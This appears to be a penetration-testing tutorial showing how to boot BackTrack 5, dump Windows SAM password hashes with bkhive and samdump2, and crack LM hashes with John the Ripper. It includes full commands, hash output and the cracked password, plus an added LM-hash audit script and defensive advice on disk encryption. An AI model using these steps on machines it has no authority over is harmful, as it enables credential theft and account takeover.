Simply drop in your BackTrack 5 CD or USB and boot from the inserted media. Once booted, type startx; you can do everything from the console, but it’s nicer to have a pretty GUI!

Left-click Places at the top and then click on the Windows partition you wish to mount.

Then open a terminal and first of all use bkhive to dump the SYSKEY bootkey from the Windows SYSTEM hive.

root@bt:~# bkhive /media/10B9-F2B6/WINNT/system32/config/SYSTEM /root/keyfile.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 7abeb4c282eaef5bfa7a75c197be8f85

The next step is to use the SAM file along with the bootkey to extract the hashes:

root@bt:~# samdump2 /media/10B9-F2B6/WINNT/system32/config/SAM /root/keyfile.txt | tee hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ASPNET:1000:b50fd6425ebf847332ada17f89c09dc9:63c184dd474f5d902a830545d9bdcfad:::
IUSR_WEBINSPECT:1001:eeb699201309cb097b3ac7d5e9ecfe77:d61861bf937514d0a6dd9fbf4e7b8376:::
IWAM_WEBINSPECT:1002:7d5621a567c0b5433c884480b718e30a:a4283d74fda5cd3a65641d52873adb78:::

Now that we have the hashes we can start cracking them using brute-force or wordlist attacks. In this example I will use John the Ripper as it’s just a quick demo, but you could also use ophcrack to utilise rainbow tables or hashcat to utilise the power of your GPU.

root@bt:~# cd /pentest/passwords/john/
root@bt:/pentest/passwords/john# john /root/hashes.txt
Warning: detected hash type "lm", but the string is also recognized as "nt"
Use the "--format=nt" option to force loading these as that type instead
Warning: detected hash type "lm", but the string is also recognized as "nt2"
Use the "--format=nt2" option to force loading these as that type instead
Loaded 9 password hashes with no different salts (LM DES [128/128 BS SSE2])
                 (Guest)
NK               (Administrator:2)
HACMEBA          (Administrator:1)
guesses: 3  time: 0:00:00:39 0.01% (3)  c/s: 173509K  trying: 08529IK - 08527NI
Warning: passwords printed above might be partial
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

Bingo! Looks like we’ve got the first and second parts of the 9-character password (an LM hash splits the password into two halves, here 7 characters and then 2 characters, each cracked independently; this is the whole reason we use passwords of more than 14 characters!)

root@bt:/pentest/passwords/john# john --show /root/hashes.txt
Administrator:HACMEBANK:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

3 password hashes cracked, 6 left
root@bt:/pentest/passwords/john#

Password = HACMEBANK
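The user:RID:LM:NT::: lines that samdump2 prints above are worth auditing on your own hosts, since any account that still stores an LM hash is exposed to the 7+7 split cracking shown. The following is an added example, not code from the original post or from the samdump2 project: a small parser for that format that reports which accounts still carry an LM hash and which have a blank password. The empty-password LM and NT values are the ones visible on the Guest line above; the svc_backup line and its NT hash are constructed sample data.

```python
import re
from dataclasses import dataclass

# Hashes of the empty password, as seen on the Guest line of the dump above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:rid:lmhash:nthash::: as written by samdump2 / pwdump-style tools
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means the (<=14 char) password was stored as two
        # independently crackable 7-character halves.
        return self.lm != EMPTY_LM

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT


def parse_pwdump(text: str) -> list[Account]:
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised pwdump line: {line!r}")
        user, rid, lm, nt = m.groups()
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def audit(text: str) -> dict[str, list[str]]:
    accts = parse_pwdump(text)
    return {
        "lm_stored": [a.user for a in accts if a.lm_stored],
        "blank_password": [a.user for a in accts if a.blank_password],
    }


# Constructed sample: first two lines are from the dump above, the third is made up.
SAMPLE = """\
Administrator:500:1d9321d6da8213bdc4482861fc3ea9db:80290fc9b3c2b233769aa9d6ced8bc86:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    for finding, users in audit(SAMPLE).items():
        print(f"{finding}: {', '.join(users) or 'none'}")
```

Run it over a dump of your own SAM (or a domain export in the same format) to list the accounts whose LM storage should be switched off via the NoLMHash policy and whose passwords need resetting.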

So the moral of the story is to use full disk encryption to protect against this type of attack (and, as an extra precaution, prevent booting from CD, DVD and removable media devices).
